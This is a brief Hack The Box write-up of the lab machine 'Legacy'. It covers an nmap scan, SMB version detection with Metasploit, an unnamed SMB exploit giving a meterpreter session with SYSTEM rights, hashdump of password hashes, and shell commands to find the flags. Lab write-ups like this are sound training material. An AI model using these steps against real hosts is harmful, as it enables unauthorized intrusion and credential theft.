Hack The Box (Legacy)

By: Nicholas Werner

nmap scan to see which ports are open and which services are running on the Legacy machine (10.10.10.4)

Ports 139 and 445 are open and they are both SMB related.

I ran smbclient -L to list out any files in SMB.

It did not work.

Now, I want to run msfconsole to start Metasploit.

search smb_version helps me to find out what version of SMB this machine is running.

use auxiliary/scanner/smb/smb_version allows me to enter that module that I just found.

options helps me to configure the scan. set rhosts 10.10.10.4 sets the rhosts to my victim machine. Typing options again allows me to see what options I just set. exploit runs the module.

I found that the host is running Windows XP SP3 so I want to search around to see what exploits are out there.

Generally, if there is a link for Rapid7 I will use that.

I type in the first line into Metasploit like above, options, set rhosts 10.10.10.4, exploit.

It appears that the exploit was completed but no meterpreter session was created so I might want to try a different payload.

I ended up changing the lhost to 10.10.14.7 (tun0) because I noticed that was not correct and I got a meterpreter session.

With getuid it look like we already have system level privileges.

hashdump allows us to view the password hashes of each user.

shell is used to get a shell in the Windows machine. Then I start to look around to see if I can find the flag.

Commands used:

c:\

dir

cd “Documents and Settings”

dir

cd john

dir

cd Desktop

dir

Here is the flag for the user.

Here is the flag for the administrator/system.